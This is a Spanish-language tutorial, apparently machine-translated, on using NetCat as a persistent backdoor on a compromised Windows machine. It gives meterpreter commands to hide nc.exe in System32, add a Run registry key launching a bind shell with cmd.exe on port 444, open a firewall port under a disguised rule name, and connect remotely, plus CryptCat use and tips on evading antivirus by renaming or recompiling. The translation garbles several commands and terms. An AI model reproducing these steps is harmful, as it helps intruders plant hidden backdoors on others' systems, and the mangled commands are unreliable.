Introducción:
NetCat es una utilidad de red que puede leer y escribir en los puertos UDP y TCP. A menudo se le conoce la navaja suiza del ejército de herramientas de piratería porque puede hacer varias cosas como un cliente y un servidor durante las aventuras de piratería. A menudo lo usaremos para crear capó de byk e invertir en torno a los informes para ver qué está sucediendo y enviar archivos entre máquinas. Shell es una forma en que puede interactuar con una computadora como un símbolo del sistema en Windows o Terminal en Linux. NetCat nos permite realizar muchas cosas como estantes inversos, comunicarnos entre dos o más computadoras, y le permitirá realizar una gran cantidad de funciones. NetCat puede escanear puertos y conectarse para abrir puertos utilizando sus argumentos de comando simples. También es capaz de enviar archivos y proporcionar administración remota a través de un shell directo o inverso.
Emplear a Netcat como agente persistente:
NetCat es un programa extremadamente versátil y útil. He mencionado anteriormente en este artículo que se usa para comunicarse entre dos computadoras. También se puede usar si desea instalar persistencia. NetCat se puede usar como puerta trasera. Entonces, comencemos con la creación de un caparazón persistente en el sistema comprometido utilizando NetCat. Usaremos -nc.exe, como su nombre ejecutable. Pero si lo cambia de nombre antes de usarlo minimiza las posibilidades de detección. Sin embargo, incluso después de cambiar el nombre de un software antivirus puede detectarlo. Muchos piratas informáticos alteran algunos de los elementos del código fuente de Netcat, que son innecesarios y, antes de usarlo, lo recompilen. Estos cambios harán que NetCat sea invisible para el software antivirus.
En Kali, NetCat se almacena en el/usr/share/windows-binarios. Para cargarlo al sistema comprometido, use el comando desde dentro de meterpreter:
$ meterpreter> cargar/usr/share/windows-binaries/nc.Exe C: \\ Windows \\ System32
Hay muchos filetipos en esta carpeta, para ocultar un archivo en un sistema comprometido es el mejor lugar
También puede usar un protocolo de transferencia de archivos trivial si no tiene una conexión de meterpreter para transferir el archivo.
El siguiente paso es configurar el registro para que pueda iniciar NetCat cuando el sistema se inicie y asegurarse de que esté escuchando en el puerto 444. Use el comando que se proporciona a continuación:
$ meterpreter> reg setval -k hklm \\ software \\ Microsoft \\ Windows \\
CurrentVersion \\ run -vv nc -d 'c: \\ windows \\ system32 \\ nc.exe -dp 444
-E CMD.exe'
Ahora que ha utilizado el comando mencionado anteriormente, use el siguiente comando QueryVal para asegurar la implementación exitosa del cambio en el registro.
$ meterpreter> reg queryval -khklm \\ Software \\ Microsoft \\ Windows \\
Currentverion \\ run -vv nc
Abra un puerto en un firewall local para confirmar que el sistema comprometido aceptará conexiones remotas con NetCat utilizando el comando $ netsh. Saber el sistema operativo del objetivo tiene una importancia primordial. El contexto de línea de comandos utilizado para Windows Vista, Windows Server 2008, es
$ Netsh AdvfireWall
Para sistemas anteriores, se utiliza el comando $ netsh firewall. Ingrese el comando shell en la solicitud de meterpreter para agregar el puerto al firewall de Windows local, ingrese la regla utilizando el comando adecuado. Para el funcionamiento adecuado del sistema, el nombre de usuario como 'svChostPassthrough' mientras nombra la regla. Un comando de muestra se muestra de la siguiente manera:
$ C: \ Windows \ System32> Netsh Firewall Agregar puerto de apertura
TCP 444 "Pass-through de servicio"
Para confirmar que el cambio se implementó correctamente utilizando el siguiente comando:
$ C: \ Windows \ System32> Netsh Firewall Show Puerto Apertura
Después de la confirmación de la regla del puerto, asegúrese de que la opción de reinicio funcione.
Ingrese el siguiente comando desde el indicador de meterpreter:
$ meterpreter> reiniciar
Ingrese el siguiente comando desde un shell de Windows interactivo:
$ C: \ Windows \ System32> SHUCE -R -R -T 00
Para acceder al sistema comprometido de forma remota, escriba $ NC en un símbolo del sistema, indique la verbosidad de la conexión (-v y -vv informa información básica, mucha más información respectivamente), y luego ingrese la dirección IP del objetivo y el número de puerto.
$ NC -V 192.168.43.128 444
Desafortunadamente, NetCat tiene algunas limitaciones, que no hay autenticación de datos transmitidos, y el software antivirus puede detectarlo. Sin embargo, el problema de menos cifrado se puede resolver mediante el uso de CryptCat, que es una alternativa a NetCat. Durante la transmisión entre el host explotado y el atacante, asegura datos mediante el uso de twofish cifrado. No estará mal decir que proporciona una protección razonablemente fuerte para los datos cifrados.
Asegúrese de que haya un oyente listo y configurado con una contraseña segura para usar Cryptcat, use el siguiente comando:
$ sudo cryptcat -k contraseña -l -p 444
El siguiente paso es cargar CryptCat en el sistema comprometido y configurarlo para conectarse con la dirección IP del oyente utilizando el siguiente comando:
$ C: \ cryptcat -k contraseña444
Es lamentable decir que NetCat y sus variantes pueden ser detectados por el software antivirus. Al usar un editor hexadecimal para alterar el código fuente de NetCat, existe la posibilidad de que Netcat no se detecte. Pero es un largo proceso de prueba y error. Un enfoque más confiable es utilizar los mecanismos de persistencia del marco MetaSploit.
Conclusión:
Netcat es una navaja suiza que se usa para piratería eficiente. Puede realizar varias funciones para acceder al servidor y al cliente. Este artículo le proporciona una breve descripción de la función y el uso de NetCat. Espero que te haya gustado si este artículo te ha ayudado, entonces compartirlo con tus amigos. No dude en preguntar sobre cualquier consulta que tenga con respecto a NetCat. También puede compartir su opinión y más detalles.